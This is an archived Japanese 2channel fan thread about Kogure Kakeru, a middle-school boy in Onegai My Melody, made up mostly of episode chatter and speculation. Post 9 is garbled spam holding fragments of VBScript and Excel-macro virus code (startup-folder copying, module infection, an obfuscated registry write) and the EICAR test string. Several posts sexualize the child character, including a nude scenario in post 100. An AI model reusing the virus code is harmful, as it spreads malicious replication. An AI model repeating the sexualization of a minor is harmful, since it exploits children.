2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【おねがいマイメロディ】小暮駆萌えスレその6

1 :名無しさん@お腹いっぱい。:2007/10/31(水) 08:44:22 ID:VwxEmzrZ
ここは、アニメ「おねがいマイメロディ」に出てくるキャラクター,
小暮駆君に萌えるスレです。
           r,. -ヽノ<
          /, ,. 、 -ミヽ._
           ´7/_ノi jノ>、 i}`
           _,ノ」f´。'V '。ヽノし
          ゝl、´,.n、` ノ'′
           /⌒`「!ll }'「_
            { ヽ <ゝ. ノ<   }
           |ヽ ヽ,ノ !,、Y /
          | ゝ「'  }Yj|_」
         |  \ノ´ヾ. |
          ,ノ _,,.>┴、 Y!
        j^'//  ,ノ-‐}|
        {ノj7ヽ,.イー|  |ヽ__
        」/ ,/ j!  |  lー‐'^`
      ,、<´>/一' ̄`ー}i'´ハ
     (._ 7ノ      j' ̄ 」
       ̄          ` ̄
その1 http://anime.2ch.net/test/read.cgi/anichara2/1139485971/
その2 http://anime.2ch.net/test/read.cgi/anichara2/1155571905/
その3 http://anime2.2ch.net/test/read.cgi/anichara2/1167993964/
その4 http://anime2.2ch.net/test/read.cgi/anichara2/1174145245/
その5http://anime2.2ch.net/test/read.cgi/anichara2/1178812459/l50

2 :ワッペン:2007/10/31(水) 09:38:25 ID:Svvv2742
         _,__       ここはひとつ>>2ゲットとったオレを立ててくれよ
     /::::::::::::::::::::::::::ヽ     
   /:::::::::::::::::::::::::::::::::::::::::.\    優良なアニメから理不尽にも順々に
  /`.:::::::::::::::/゛`〜、:::::::::::::\   迫害されていく(´`)
 / / ^ヽ:::l`    \::::::::::::::ヽ
  . /   ヽl  ヽ   \::::::::::::l  迫害を受け続けたオレだからいえることだが
  !  _    _     \:::::::l 
  、 /`  ヽ ./ 。  \    \::l  アニメで生きてきた人間は命を捧げる使命があるんだよ
  ヽ 、 。ン ヽ   ノ   ゙’(6j  命をなげうつ覚悟のあるやつはオレについてこい!
   ヽ ̄  ’’   ̄    _∪  
   ヽ   ◇        ノ   テレ朝のアニメランキング操作に始まる、歪曲された報道
    .`、        _/    を鵜呑みにしない正しい批判的精神を取り戻させるために
   .  .`-.    .r°     いよいよ立ち上がるときが来たようだ

3 :名無しさん@お腹いっぱい。:2007/10/31(水) 09:59:01 ID:53vnn8RB
>>1
乙枯れクマ

4 :名無しさん@お腹いっぱい。:2007/10/31(水) 11:54:54 ID:u9VsCxMe
>>1


5 :名無しさん@お腹いっぱい。:2007/10/31(水) 13:10:29 ID:EQJVC9Mt
「・・>>1が乙だよ」

6 :名無しさん@お腹いっぱい。:2007/10/31(水) 15:36:42 ID:vrRPPhdb
>>1の乙、へちゃむくれー

7 :名無しさん@お腹いっぱい。:2007/10/31(水) 17:26:24 ID:YI+f6sE1
乙!何で落ちたんだ?

8 :名無しさん@お腹いっぱい。:2007/10/31(水) 18:57:35 ID:WZfa3gaY
駆にかける

9 :名無しさん@お腹いっぱい。:2007/10/31(水) 18:58:56 ID:HNN7UY+A
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


10 :名無しさん@お腹いっぱい。:2007/10/31(水) 19:49:14 ID:xJdXC3oL
これウィルスコード?

11 :名無しさん@お腹いっぱい。:2007/10/31(水) 20:29:01 ID:53vnn8RB
>>7
1日1書きでは足りなくなってきた模様
半日空きでも怪しくなってる
キャラ板のスレが増えすぎたのが原因か?

12 :名無しさん@お腹いっぱい。:2007/10/31(水) 22:32:46 ID:ozKqHnQE
すっきりでの駆回

第3話「お弁当ですっきり!?」
後輩の女の子から駆へ弁当差し入れ。歌ちゃん負けじと弁当作りに挑戦。
作画は・・・


13 :名無しさん@お腹いっぱい。:2007/11/01(木) 00:10:03 ID:KMS24qh1
もっと小暮きゅんに出番を!!
クリスマスCDには曲あるのかな。

14 :名無しさん@お腹いっぱい。:2007/11/01(木) 01:19:15 ID:TywVkMSf
>>13
以前見たCDの情報には小暮の名前があったけどね

15 :名無しさん@お腹いっぱい。:2007/11/01(木) 01:29:34 ID:D2iLczYu
>>7
過疎ってたしな。人が減ったからか?

16 :名無しさん@お腹いっぱい。:2007/11/01(木) 01:31:45 ID:KMS24qh1
スレが落ちやすくなってるみたいね。タイミングが悪かったか。

17 :名無しさん@お腹いっぱい。:2007/11/01(木) 01:42:17 ID:TywVkMSf
律儀に相手することないよ

18 :名無しさん@お腹いっぱい。:2007/11/01(木) 07:39:29 ID:WyUN33xO
そう言えばオンリーに行った人はいるかな?
個人的には本よりも小説がエロかった罠

19 :名無しさん@お腹いっぱい。:2007/11/01(木) 16:42:34 ID:XMOIdF1t
オンリーて何ぞ?

20 :名無しさん@お腹いっぱい。:2007/11/01(木) 19:09:41 ID:WyUN33xO
>>19
マイメロオンリーの即売会
兄弟本が多かったがそれなりに収穫もあった

21 :名無しさん@お腹いっぱい。:2007/11/02(金) 00:43:26 ID:TwqtyNC0
そういったものがあるとですか
わざわざthx

22 :名無しさん@お腹いっぱい。:2007/11/02(金) 07:44:18 ID:W/7lOE8I
ショタ即売会でも数が減りつつあるからなぁ…
オンリーの方がいいのかもしれんね

23 :名無しさん@お腹いっぱい。:2007/11/02(金) 22:22:40 ID:cmt+05q/
第8話「はじけてすっきり!?」
♭が久しぶりに登場。誤解が基でプンプン化。
風呂敷♭がかわいい。

24 :名無しさん@お腹いっぱい。:2007/11/02(金) 23:52:51 ID:YhS0Mxkv
次回は出番なさそうかな?
予告に期待しとくか。

25 :名無しさん@お腹いっぱい。:2007/11/03(土) 05:07:49 ID:cIoNZp/D
マイメロにも二次創作とかあるのか

26 :名無しさん@お腹いっぱい。:2007/11/03(土) 08:25:57 ID:6J/jha1v
前スレ落ちちゃったのか…
今度は落とさないようにもっと書き込みに来るか

明日も出るとイイナ!

27 :名無しさん@お腹いっぱい。:2007/11/03(土) 20:26:53 ID:dazn09CI
>>25
結構多い気がする

28 :名無しさん@お腹いっぱい。:2007/11/04(日) 05:16:03 ID:b/5in5NB
>>27
同人だけでなくネットとかも含めると多い多い
と言う訳でエロ小説でも書いてきます

うpらないが

29 :名無しさん@お腹いっぱい。:2007/11/04(日) 10:00:52 ID:b/5in5NB
来週の出番にwktk

30 :名無しさん@お腹いっぱい。:2007/11/04(日) 13:30:40 ID:RTTbFX0V
予告見た
これは期待せざるをえない

31 :名無しさん@お腹いっぱい。:2007/11/04(日) 14:49:02 ID:3fuk6Trd
マイメロの代打パートナーあるかな?

今回エレが出るかと思ったけど出なかったので
皆勤4キャラ以外での登場回数は首位キープ

32 :名無しさん@お腹いっぱい。:2007/11/04(日) 17:37:19 ID:l9G0FTha
駆かわいいよ駆

33 :名無しさん@お腹いっぱい。:2007/11/04(日) 19:41:49 ID:qjaxCelR
小暮に恋してしまった

34 :名無しさん@お腹いっぱい。:2007/11/04(日) 20:00:56 ID:wdDKf/++
駆と合体したい

35 :名無しさん@お腹いっぱい。:2007/11/04(日) 23:14:17 ID:Xdg4f71B
次回は話も作画も楽しみだ

36 :名無しさん@お腹いっぱい。:2007/11/05(月) 01:03:58 ID:MxcjcA41
ポロリもあるらしいお!

37 :名無しさん@お腹いっぱい。:2007/11/05(月) 13:37:14 ID:HWPOdsUs
駆との結婚式にはおまえら全員招待するからな

38 :名無しさん@お腹いっぱい。:2007/11/05(月) 16:39:42 ID:TBykImXN
他人の夢の中には入り込めないしなあ

39 :名無しさん@お腹いっぱい。:2007/11/05(月) 16:58:17 ID:Rr46i0bT
>>37
それは白山だぞ

40 :名無しさん@お腹いっぱい。:2007/11/05(月) 23:19:35 ID:Zx5fSvs4
次回は歌ちゃんの誕生日回というわけではなさそうだな

41 :名無しさん@お腹いっぱい。:2007/11/06(火) 01:21:19 ID:WxZGsySX
小暮きゅんage

42 :名無しさん@お腹いっぱい。:2007/11/06(火) 07:57:34 ID:a+yCWWVW
>>37
それ森内だぞ

43 :名無しさん@お腹いっぱい。:2007/11/06(火) 08:52:46 ID:KJr5j3pF
>>42

歩きゅんでもいいな。
自分は歩きゅんも好きだし。

44 :名無しさん@お腹いっぱい。:2007/11/06(火) 12:10:53 ID:gyHabcCs
以前、この小暮スレで情報くれた人達どうもありがとう。
パロ大筋出来上がった。断っとくとエロ分は結構少ない。

来週から月〜金でゆるりと進行する予定。4649

45 :名無しさん@お腹いっぱい。:2007/11/06(火) 17:44:40 ID:ri0LC6fa
ちょっとコンビニでアイス買ってくるついでに小暮さらってくるわ

46 :名無しさん@お腹いっぱい。:2007/11/06(火) 18:32:59 ID:a+yCWWVW
>>44
wktkさせてもらおうか

47 :名無しさん@お腹いっぱい。:2007/11/06(火) 23:34:55 ID:jFeWn/wT
第14話「初デートですっきり!?」
駆と歌ちゃんの初デート。山本登場、求めすぎ(?)な自分に目が覚めて目覚めてしまった。
デートに誘うのに理由繕う駆カワユス

48 :名無しさん@お腹いっぱい。:2007/11/07(水) 07:37:28 ID:620pEt/j
そろそろ駆に♪が取り付かないだろうか

49 :名無しさん@お腹いっぱい。:2007/11/07(水) 22:13:03 ID:wS/NWwFm
予告見る限り次回は歌ちゃんに付くんだよな?
いいのかw

50 :名無しさん@お腹いっぱい。:2007/11/07(水) 22:45:54 ID:GSMH5XMK
欲求不満か

51 :名無しさん@お腹いっぱい。:2007/11/08(木) 01:25:07 ID:89Wgm61v
駆が歌ちゃんをすっきりさせるんだって!!?

52 :名無しさん@お腹いっぱい。:2007/11/08(木) 07:45:15 ID:U2V+iCTc
>>51
下ネタしか浮かび上がらない俺はどうすればry

53 :名無しさん@お腹いっぱい。:2007/11/08(木) 23:05:14 ID:nARLwXGW
>>52
公式掲示板の幼女の皆さんの純真さを見習ってください

54 :名無しさん@お腹いっぱい。:2007/11/09(金) 09:55:54 ID:sR/rtJ+0
その幼女も数年後には何割かが腐○子に

55 :名無しさん@お腹いっぱい。:2007/11/09(金) 21:46:48 ID:RQTOE3AZ
いや〜ん><

56 :名無しさん@お腹いっぱい。:2007/11/09(金) 23:16:36 ID:dQMy0HPv
こぐれきゅんきゅんあげ

57 :名無しさん@お腹いっぱい。:2007/11/10(土) 11:49:24 ID:8DQQOLop
最近の駆はメタボだな。

58 :名無しさん@お腹いっぱい。:2007/11/10(土) 13:08:27 ID:3CcHgmzM
よしちょっと一汗かかせてくるか

59 :名無しさん@お腹いっぱい。:2007/11/10(土) 13:39:37 ID:ElPQLjNj
その後走りすぎて疲れた>>58が倒れているのが確認されたと言う

>>57
無駄にカッコいいIDだな

60 :名無しさん@お腹いっぱい。:2007/11/10(土) 13:51:06 ID:MrSQ3HMY
>>57

プニプニ駆きゅんも可愛いな。
て、駆きゅんて太ったか?
まあ、肥満児になっても駆きゅんだったらいい。

61 :名無しさん@お腹いっぱい。:2007/11/10(土) 22:40:33 ID:uIraBcvU
+   +
  ∩_∩  +
 (0゚・(ェ)・) wktk待機
 (0゚つ旦O +
 と__)__) +

62 :名無しさん@お腹いっぱい。:2007/11/11(日) 10:00:48 ID:QAItSiL/
駆の初めてのシリアス顔泣き…
凄く…眼福でした…

63 :名無しさん@お腹いっぱい。:2007/11/11(日) 10:04:51 ID:vUekOcBG
一時期凛々しくなってたけど、
最近はプニプニした小暮になりつつあるな


64 :名無しさん@お腹いっぱい。:2007/11/11(日) 10:55:41 ID:vUekOcBG
今日の小暮

http://www.42ch.net/UploaderAnime/source/1194742659.jpg
http://www.42ch.net/UploaderAnime/source/1194743947.jpg
http://www.42ch.net/UploaderAnime/source/1194743275.jpg
http://www.42ch.net/UploaderAnime/source/1194744604.jpg
http://www.42ch.net/UploaderAnime/source/1194745342.jpg
http://www.42ch.net/UploaderAnime/source/1194746091.jpg

65 :名無しさん@お腹いっぱい。:2007/11/11(日) 11:45:47 ID:zB9Icwbk
>>64
乙!
って最後の何だよww


64に頂いた分も一緒に
ttp://www.774.cc:8000/upload-mini/src/up1534.lzh.html

66 :名無しさん@お腹いっぱい。:2007/11/11(日) 13:06:41 ID:6l6EG8Tg
>>64-65
GJ!

しかしマイメロとのコンビもいいな
今日のマイメロを心配する駆君は可愛すぎだ

67 :名無しさん@お腹いっぱい。:2007/11/11(日) 13:17:43 ID:l73h6wCM
駆プニプニしてるなw

68 :名無しさん@お腹いっぱい。:2007/11/11(日) 14:05:49 ID:57Z8eRRl
思いっきりヒロインだった
顔も意識的に女の子らしくしたのかな?

69 :名無しさん@お腹いっぱい。:2007/11/11(日) 14:25:09 ID:ZUDkP4Bd
刺繍の下手くそさがリアルすぎてフイタ

70 :名無しさん@お腹いっぱい。:2007/11/11(日) 16:44:47 ID:tOw02Gai
足が短くて可愛かった。

71 :名無しさん@お腹いっぱい。:2007/11/12(月) 00:23:42 ID:cvjdpD0F
>>64
3枚目はどこのかわいこちゃんだよw

72 :名無しさん@お腹いっぱい。:2007/11/12(月) 00:56:34 ID:I5vGUlev
乙女っぽい。。

73 :名無しさん@お腹いっぱい。:2007/11/12(月) 02:58:50 ID:PuaQs3SX
もしかして駆きゅんの母親が、駆きゅんに可愛い子のままで、
いて欲しいあまり駆きゅんの食事に女性ホルモンを、
少量ずつ入れているのかな?
もしそうだったら駆きゅんがプニプニで可愛い顔なのも説明がつく。

74 :名無しさん@お腹いっぱい。:2007/11/12(月) 03:51:03 ID:ep1d4MfB
それならばうっすらとお胸も出てきてたり‥。
「男の子も思春期には乳首が張るモノなのよ!」
と言われて誤魔化されてそうだ。

75 :名無しさん@お腹いっぱい。:2007/11/12(月) 13:02:40 ID:zLHC2/JO
>>74
男でもホルモンバランス崩れると胸が張ったりしてしまうらしい。
新陳代謝&成長の早い中学生位の子は・・・みなまで言うまい。
だが恋をしている駆は男性ホルモン結構出てそうだな・・・

76 :名無しさん@お腹いっぱい。:2007/11/12(月) 16:07:27 ID:pvgpHQfS
授業参観で叫ぶかーちゃんはそんなタマじゃないだろう

77 :名無しさん@お腹いっぱい。:2007/11/12(月) 17:40:22 ID:PuaQs3SX
>>76

実はツンデレでは?

もしかしたら女性ホルモンプラス駆きゅんに
「今は、男の子でもエステに行くのよ!」と言って
隔週ぐらいのペースで無理矢理エステに連れて行ってるのかも。

78 :名無しさん@お腹いっぱい。:2007/11/12(月) 17:51:04 ID:Y8x7r/OK
無いだろそれは…

79 :名無しさん@お腹いっぱい。:2007/11/12(月) 17:51:33 ID:xgvXh9xx
>>77
母子家庭らしいからそんな金ありません

80 :名無しさん@お腹いっぱい。:2007/11/12(月) 20:36:11 ID:XFuA4Yyk
駆きゅんの父ちゃんはマイメロ様が...

81 :名無しさん@お腹いっぱい。:2007/11/12(月) 21:47:05 ID:zqqI4VJs
>>79
母子家庭ってネタ?それとも本当?

82 :名無しさん@お腹いっぱい。:2007/11/12(月) 22:26:03 ID:wJhFSMN0
>>81

劇中に駆きゅんの父親が一度も出てきていないから、
そう思われがちだけど実際は不明だ。
劇中で母子家庭なんて言葉は、一度も出てきていない。
でも不明なのでその可能性は、否定できない。

個人的な意見だけどもし母子家庭で、経済的余裕が無かったら
駆きゅんをわざわざ私学に入れるのか?と思う。

83 :名無しさん@お腹いっぱい。:2007/11/12(月) 22:45:52 ID:zqqI4VJs
>>82
そもそも夢ヶ丘の学校が私学かどうかもry
確かに中等部と高等部と二つあるからそういう風に見えなくも無いが

84 :名無しさん@お腹いっぱい。:2007/11/12(月) 23:01:55 ID:xgvXh9xx
普通に考えたら私学なんだろうけど、
駆が中学受験したとか考えられんなw

85 :名無しさん@お腹いっぱい。:2007/11/12(月) 23:08:02 ID:zqqI4VJs
普通にクラスに「昔から頭が成績が悪かった」とか言ってるクラスメイトもいるからなぁ

86 :名無しさん@お腹いっぱい。:2007/11/12(月) 23:43:38 ID:ep1d4MfB
潤が転校できるくらいの学力なのでは。

87 :名無しさん@お腹いっぱい。:2007/11/12(月) 23:54:46 ID:wJhFSMN0
>>84

意外と駆きゅんも小学四、五年生頃から中学受験までは、
毎日夜遅く土日祝日、長期休みも塾通いをしていたのかも。
みんなが遊んでいる中、一人寂しく塾に通う駆きゅん。
歌達や博明きゅん、歩きゅんともライバルになっていたかも。
年末年始も鉢巻をしめて、受験勉強をしていたと思うな。
その反動で中学に入ってからは、勉強をしなくなり成績が、
落ちていったとか。

て、考えすぎかな?

無印でパソコンクリーチャーになった奴は、裏口入学?

公立に行った駆きゅんの小学時代のクラスメイトは、
ゆとり教育のせいで太陽が地球の周りを回っていると
思っているどうしようもない子になっていたりして。

88 :名無しさん@お腹いっぱい。:2007/11/13(火) 00:00:51 ID:uRx/Y6wO
私立だって偏差値高いとは限らないぞw

89 :名無しさん@お腹いっぱい。:2007/11/13(火) 00:02:54 ID:Scvz2enx
そりゃピンキリだろうな。
でも偏差値低いお手軽私立だとすれば、柊兄は何で入ったんだろうか

90 :名無しさん@お腹いっぱい。:2007/11/13(火) 00:15:12 ID:CID4JDM1
駆きゅんの母親が、わざわざ高いお金(と思われる)を払って偏差値低い
私学に大事な、駆きゅんを入学させないと思うな。
半裸バイオリンが、入学するくらいだから、結構偏差値高いんじゃないないのかな?

91 :名無しさん@お腹いっぱい。:2007/11/13(火) 01:17:58 ID:gh4pSueO
柊コンツェルンが学校法人も経営してそうだ

92 :名無しさん@お腹いっぱい。:2007/11/13(火) 01:42:47 ID:WnxsPPA4
>>89
出席日数が甘いんじゃね?


ところで自分は駆の幼稚園制服姿が見たいんだが去年の歌ちゃん誕生日話にはなかったよな?

93 :名無しさん@お腹いっぱい。:2007/11/13(火) 06:33:39 ID:rsTmNsBH
今週見逃した。泣いた・・・

94 :名無しさん@お腹いっぱい。:2007/11/13(火) 08:44:18 ID:MeHegK0e
学園の呼称は公立では使えない
よって私立確定
6年制中高なら国立で存在

95 :名無しさん@お腹いっぱい。:2007/11/13(火) 13:56:09 ID:xPcAdC/1
駆きゅんは推薦枠だろう
ショタの

96 :名無しさん@お腹いっぱい。:2007/11/13(火) 15:09:08 ID:YisEPljJ
>>95

博明きゅんと歩きゅんもショタ推かな?

駆きゅんて本当は、そこらの公立校の生徒よりも
頭良かったりして。

もし駆きゅんが、男子校に行っていたら、
回りに影響されて男らしくなっていたのかな?

97 :名無しさん@お腹いっぱい。:2007/11/13(火) 16:40:44 ID:r/P7mJRL
>>96
森内は微妙じゃね?

男子校に入ったからと言って男らしくなるかは微妙じゃね?
自分の話でアレだが、自分の男子校はオタばかり誕生したぞ

98 :名無しさん@お腹いっぱい。:2007/11/13(火) 16:57:18 ID:Dyt2Gwvd
>>92
出席日数というのは目の付け所が良いかも
変態は永代橋先生が音楽担当しているのもあるかな

あと駆の陸上タイムや真菜の戦闘力をみるに、
芸術や体育に力入れてるんじゃね


99 :名無しさん@お腹いっぱい。:2007/11/13(火) 22:51:29 ID:sOwuEXz/
>>93
Youtubeがあるさ

100 :名無しさん@お腹いっぱい。:2007/11/14(水) 03:50:06 ID:1oTTDqbI
>>97

駆きゅんの今の冬の制服姿も可愛いけど、男子校の制服姿も見たいな。

下着は白ふんどしで上半身裸の上に学ランを羽織りボタンをとめていなくて
服に着られている感じの駆きゅんがイイナ。
可愛い姿の自分にコンプレックスを持ち少しでも男らしくなろうとして
背伸びをする駆きゅんて可愛いな。
でも、駆きゅんとの想いとは裏腹に駆きゅんの母親が、駆きゅんを
可愛くしようとして駆きゅんの食事に女性ホルモンを少量ずつ入れたり
カロリーの高い物ばかり食べさせて
いつまでたってもプニプニで可愛いままの駆きゅん。
お風呂上がりに姿見で全裸の可愛い姿の自分を見て
ため息をつきながら「なんで俺て、男らしくなれないんだ。」と
言っている駆きゅんが見たいな。

101 :名無しさん@お腹いっぱい。:2007/11/14(水) 07:43:59 ID:70H7uthG
>>100
風紀的にも大問題なので却下ry
更新マダー?

102 :100:2007/11/14(水) 10:09:42 ID:1oTTDqbI
>>101

更新て自分のホームページの事?
なんで自分が、ホームページ持っているの知っているの?

103 :名無しさん@お腹いっぱい。:2007/11/14(水) 13:16:31 ID:70H7uthG
>>102
あんた昔前スレに自分で晒したぢゃないか(´・ω・`)

104 :100:2007/11/14(水) 15:09:38 ID:1oTTDqbI
>>103

確かにそうだけど、よく覚えてたね。
て、なんで前のと同一人物て分かったの?

105 :100:2007/11/14(水) 17:36:40 ID:1oTTDqbI
それと更新は潤×駆の続きを、今書いています。

106 :名無しさん@お腹いっぱい。:2007/11/14(水) 18:02:20 ID:ffKlhmUh
何この自演くさい流れ

107 :名無しさん@お腹いっぱい。:2007/11/14(水) 18:03:13 ID:M7VlM3LO
このスレはフラット君の自作自演で出来ています。

108 :名無しさん@お腹いっぱい。:2007/11/15(木) 13:07:41 ID:k6lb4cT+
メロママに期待していたがあの落書きに何を期待したのだw

109 :名無しさん@お腹いっぱい。:2007/11/15(木) 21:15:28 ID:OtMY+CMw
歌は、プニプニで可愛い駆きゅんとすっきりの最初の頃の
凛々しい駆きゅんとどっちが良いんだろう?

やっぱり凛々しい駆きゅんかな?
歌としては、駆きゅんが自分より可愛かったら
立つ瀬が無いだろうし。でも今のところ駆きゅんが、歌より可愛いな。

もしかして歌は、駆きゅんを凛々しくしようとして
弁当に大量の男性ホルモンを・・・

110 :名無しさん@お腹いっぱい。:2007/11/15(木) 21:18:59 ID:19/2c1x4
どれちょっと駆きゅんを男にしてくるか

111 :名無しさん@お腹いっぱい。:2007/11/16(金) 00:14:51 ID:oFDssSmj
>>109
てめえwkwkスレにいたきゅんさんじゃねーですか?

112 :名無しさん@お腹いっぱい。:2007/11/16(金) 02:38:18 ID:EIMvxN0u
それから歌はもしかして筋肉増強剤も入れているかも?
そのせいで駆きゅんが、筋肉ムキムキになったりして。
小柄ながらも胸板が厚くなり、腹筋が六つに割れて
手足の筋肉もムキムキになったりして。
もしそうなったら駆きゅんは、喜ぶのかな?

113 :名無しさん@お腹いっぱい。:2007/11/16(金) 11:04:41 ID:LYdN+BwU
ちょっと自重してくれ。
ちょっとでいいから頼む

114 :名無しさん@お腹いっぱい。:2007/11/16(金) 12:45:36 ID:y/DdchJl
たしかにちょっとクドイな。
プニショタ小暮きゅんage

115 :名無しさん@お腹いっぱい。:2007/11/16(金) 16:07:27 ID:pCca16QK
上も下も可愛い子だね

116 :名無しさん@お腹いっぱい。:2007/11/17(土) 02:02:10 ID:vPJ9JfJq
次回は賑やかしかな?

117 :名無しさん@お腹いっぱい。:2007/11/17(土) 07:29:27 ID:+bFIVW42
歌ちゃん冷やかしてるやんちゃな小暮が好き

118 :名無しさん@お腹いっぱい。:2007/11/17(土) 13:15:42 ID:zTyX7vZr
今は大人しすぎるな。
個人的にはその大人しさとやんちゃの間くらいがいいのだがw

119 :名無しさん@お腹いっぱい。:2007/11/17(土) 15:09:11 ID:SA/YVA/7
>>118

チョロ毛の時に潤きゅんとウサミミと、騒いでたのが良かった。
すっきりで駆きゅんが騒いでいるところて、無いな。
駆きゅんて潤きゅんと一緒だと騒がしいな。

120 :名無しさん@お腹いっぱい。:2007/11/18(日) 09:07:33 ID:x1ducMFO
大人の階段昇る君はまだシンデレラさ〜


121 :名無しさん@お腹いっぱい。:2007/11/18(日) 09:58:33 ID:vbJcJc9y
今週も堪能できたし来週も出番が!!

122 :名無しさん@お腹いっぱい。:2007/11/18(日) 10:14:03 ID:JScQAJUg
三週連続登場は今期初かい?
http://www.774.cc:8000/upload-mini/src/up1554.lzh.html

123 :名無しさん@お腹いっぱい。:2007/11/18(日) 10:15:05 ID:GVzTk+sy
いまさらながら4人のなかで黒一点なのに本当に浮かないなぁ


124 :名無しさん@お腹いっぱい。:2007/11/18(日) 12:14:39 ID:x1ducMFO
そういえば、今期まだ脱いでないよな

125 :名無しさん@お腹いっぱい。:2007/11/18(日) 15:49:10 ID:vbJcJc9y
>>124
潤の別荘で水着着てたぞ

126 :名無しさん@お腹いっぱい。:2007/11/18(日) 18:08:57 ID:d8NGT50h
http://nov.2chan.net/24/src/1195346024593.jpg
小暮キュンカワイイよ小暮きゅん

127 :名無しさん@お腹いっぱい。:2007/11/19(月) 19:45:50 ID:gODPXJVN
マイメロが頭に乗っても違和感がない男は他にいないだろう

128 :名無しさん@お腹いっぱい。:2007/11/19(月) 20:54:18 ID:t17Se4bv
>>127

太田きゅんや中沢きゅんでも似合うかも。

129 :名無しさん@お腹いっぱい。:2007/11/20(火) 10:20:29 ID:47j9lFE6
幼少期ならまだしも、中2までずっと女の子3人とフツーに遊んでる男は
まずいないだろう
作中ではほとんど出てこないが、美紀とも結構話してるだろうな

130 :名無しさん@お腹いっぱい。:2007/11/20(火) 10:32:57 ID:yjmLv9fK
>>129

駆きゅんが可愛いのは、歌達とずっと遊んでいるからなのかな?
付き合う人間同士顔つきが、似るて言うし。
知らないうちに駆きゅんて、歌達に影響されているのかな?
だから、何の抵抗もなくフラットを頭の上に乗せたり、マイメロを
抱っこできるのかも。
でも、個人的には、歩きゅん達と遊ぶやんちゃで、可愛い駆きゅんがイイナ。

131 :名無しさん@お腹いっぱい。:2007/11/20(火) 13:42:18 ID:jNYflo89
ほっぺにすいつきてえ・・・

132 :名無しさん@お腹いっぱい。:2007/11/20(火) 20:07:02 ID:47j9lFE6
>>130
長いこと女の子と一緒に遊んでたことで
精神面で女の子みたいなところは出てくるだろう
それが可愛さとして表れてきても何等不思議でない
ところで、真菜が歌&美紀と親しくなった契機がよくわからないけど
駆が何等かの形で関与してるんじゃないかな?

133 :名無しさん@お腹いっぱい。:2007/11/21(水) 01:39:25 ID:z7is9aDo
>>132

自分の予想は、駆きゅん達が小さい頃歌達と遊んでばかりいる
駆きゅんが他の男の子達にいじめられていたのを、
真菜が助けたとか。

あるいは、歌達がいじめられていて駆きゅんがかばって、
ボコボコにされているのを真菜が助けたとか。

134 :名無しさん@お腹いっぱい。:2007/11/21(水) 03:55:15 ID:Ye4YvKVn
アニメの真菜と駆の絡みっぷりを見ていると駆が真菜に助けられたというより
いじめられている子を2人で助けようとして
そこで意気投合した、みたいなイメージがあるな

135 :名無しさん@お腹いっぱい。:2007/11/21(水) 04:10:24 ID:z7is9aDo
それにしても駆きゅんよく陸上部に入ったね。
もっと女の子ぽいクラブに入れば良かったのに。

136 :名無しさん@お腹いっぱい。:2007/11/21(水) 05:03:36 ID:zmU+XjIC
女の子ぽいクラブってなんだw
図書委員とかか?

137 :名無しさん@お腹いっぱい。:2007/11/21(水) 06:20:39 ID:z7is9aDo
>>136

図書委員は、クラブではなくて委員会だろ。

女の子ぽいクラブといえば、日舞、華道、茶道とかだろう。

自分は学生時代、茶道部(表千家)だったんだが、
茶道は男と女で作法が、微妙に違って小物も違うんだけど
駆きゅんには、女手前が似合いそう。

138 :名無しさん@お腹いっぱい。:2007/11/21(水) 06:58:32 ID:z7is9aDo
後、新体操とかかな。

139 :名無しさん@お腹いっぱい。:2007/11/21(水) 09:22:22 ID:6Nbnedwz
こんなカンジか?

小学校に入学して間もない歌は同じクラスの一員になった駆に
しばしからかわれていた
ある日公園で遊んでいた歌は背後から駆に忍び寄られた
「ゆーめーのー」
駆の右手には小枝に刺した犬の糞が…
泣きわめく歌の姿を見て面白がっていた
そんな光景を公園の隅で空手の練習をしていた真菜が見ていた
真菜は歩み寄って駆の右手の小枝を振り払い
「おんなのこにらんぼうしたらあかんで」
「な、なんだよおまえ」
「なんならうちがあいてしたるで」
取っ組み合いになったが、駆は真菜に痛めつけられる一方で擦り傷だらけに
だが駆は、どんなに痛めつけられても諦めようとはしなかった
やがて精も根も尽き果て、お互い大の字に仰向け
「おまえみたいなしつこいのははじめてや、うちはふじさきまな、おまえは?」
「こ、こぐれ…かける」
「こぐれか、おぼえとくで」

140 :名無しさん@お腹いっぱい。:2007/11/21(水) 19:55:57 ID:z7is9aDo
駆きゅんが、お姉キャラにならなかったのは、真菜の影響かな?
駆きゅんも真菜みたいに、格闘技習えば良かったのに。
相撲とか。

141 :名無しさん@お腹いっぱい。:2007/11/21(水) 23:36:41 ID:djYPS23P
駆とぶつかり稽古とか、何という役得>相撲

142 :名無しさん@お腹いっぱい。:2007/11/21(水) 23:47:31 ID:sxs42qyi
じゃあ俺は廻ししめるの手伝う役で

143 :名無しさん@お腹いっぱい。:2007/11/22(木) 00:48:04 ID:WdojByqP
次回は楽しみだなあ

144 :名無しさん@お腹いっぱい。:2007/11/22(木) 01:37:39 ID:LsIVFYXM
駆きゅんに無理矢理ちゃんこを食べさせて、
適度なプニプニ体型にさせたい。
(間違ってでも白山体型には、なって欲しくない。)

145 :名無しさん@お腹いっぱい。:2007/11/22(木) 15:01:35 ID:krS1W75e
ぬいぐるみ化(?)小暮は
相変わらずやばいくらいかわいいな

146 :名無しさん@お腹いっぱい。:2007/11/23(金) 01:46:41 ID:YIe6qJLp
駆きゅんが母親の事を「かあちゃん」て言うのが可愛いな。
歌の父親の事も「夢野の父ちゃん」て言っていたし、
駆きゅんて幼い所が、あるのかな?
